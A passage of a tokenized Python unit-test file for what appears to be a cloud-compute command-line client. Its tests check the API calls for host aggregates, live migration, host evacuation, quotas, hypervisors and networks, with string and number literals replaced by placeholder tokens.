run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_add_host_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_remove_host_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_remove_host_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { "<STR_LIT>" : { "<STR_LIT:host>" : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = - <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = - <NUM_LIT:1> ) <EOL> def test_aggregate_details_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_details_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_show_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_aggregate_show_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_live_migration ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True } } ) <EOL> def test_live_migration_v225 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } ) <EOL> self . run_command ( '<STR_LIT>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> def test_live_migration_force_complete ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_list_migrations ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_get_migration ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_live_migration_abort ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_host_evacuate_live_with_no_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_2_25 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_target_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_block_migration ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_block_migration_2_25 ( self ) : <EOL> self . run_command ( '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_disk_over_commit ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_live_with_disk_over_commit_2_25 ( self ) : <EOL> self . assertRaises ( SystemExit , self . run_command , <EOL> '<STR_LIT>' , <EOL> api_version = '<STR_LIT>' ) <EOL> def test_host_evacuate_list_with_max_servers ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT:host>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body , pos = <NUM_LIT:1> ) <EOL> def test_reset_state ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } ) <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT>' } } ) <EOL> def test_reset_state_with_all_tenants ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , <EOL> '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } ) <EOL> def test_reset_state_multiple ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } , pos = - <NUM_LIT:4> ) <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT:error>' } } , pos = - <NUM_LIT:1> ) <EOL> def test_reset_state_active_multiple ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT>' } } , pos = - <NUM_LIT:4> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:state>' : '<STR_LIT>' } } , pos = - <NUM_LIT:1> ) <EOL> def test_reset_network ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : None } ) <EOL> def test_services_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_list_with_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_list_with_binary ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_list_with_host_binary ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_services_enable ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_services_disable ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_services_disable_with_reason ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:host>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> self . 
assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_services_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_fixed_ips_get ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_fixed_ips_reserve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_fixed_ips_unreserve ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_host_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_list_with_zone ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_update_status ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:status>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_host_update_maintenance ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_host_update_multiple_settings ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT:status>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_host_startup ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_shutdown ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_reboot ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_host_evacuate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } } , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_with_shared_storage ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } , pos = <NUM_LIT:4> ) <EOL> def test_host_evacuate_with_no_target_host ( self ) : <EOL> self . 
run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True } } , pos = <NUM_LIT:4> ) <EOL> def test_host_servers_migrate ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' , pos = <NUM_LIT:0> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:1> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:2> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:3> ) <EOL> self . assert_called ( '<STR_LIT:POST>' , <EOL> '<STR_LIT>' , { '<STR_LIT>' : None } , pos = <NUM_LIT:4> ) <EOL> def test_hypervisor_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_list_matching ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_servers ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_show_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_list_show_by_cell_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_show_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_uptime_by_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_uptime_by_cell_id ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_uptime_by_name ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_hypervisor_stats ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_show ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_user_quota_show ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_quota_show_no_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_defaults ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT:GET>' , <EOL> '<STR_LIT>' ) <EOL> def test_quota_defaults_no_tenant ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_update ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_user_quota_update ( self ) : <EOL> self . 
run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_quota_force_update ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_quota_update_fixed_ip ( self ) : <EOL> self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:5> } } ) <EOL> def test_quota_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_user_quota_delete ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def test_quota_class_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_quota_class_update ( self ) : <EOL> args = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> for arg in args : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % arg ) <EOL> request_param = arg [ <NUM_LIT:2> : ] . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> body = { '<STR_LIT>' : { request_param : <NUM_LIT:5> } } <EOL> self . assert_called ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> body ) <EOL> def test_network_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . 
assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_network_list_fields ( self ) : <EOL> output , _ = self . run_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> self . assertIn ( '<STR_LIT>' , output ) <EOL> def test_network_list_invalid_fields ( self ) : <EOL> self . assertRaises ( exceptions . CommandError , <EOL> self . run_command , <EOL> '<STR_LIT>' ) <EOL> def test_network_show ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cloudpipe_list ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def test_cloudpipe_create ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_cloudpipe_configure ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT>' , '<STR_LIT>' , body ) <EOL> def test_network_associate_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_associate_project ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT:id>' : "<STR_LIT:1>" } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_disassociate_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_disassociate_project ( self ) : <EOL> self . run_command ( '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : None } <EOL> self . 
assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_v4 ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_v6 ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> def test_network_create_invalid ( self ) : <EOL> cmd = '<STR_LIT>' <EOL> self . assertRaises ( exceptions . CommandError , self . run_command , cmd ) <EOL> def test_network_create_multi_host ( self ) : <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } <EOL> self . assert_called ( '<STR_LIT:POST>' , '<STR_LIT>' , body ) <EOL> self . run_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) 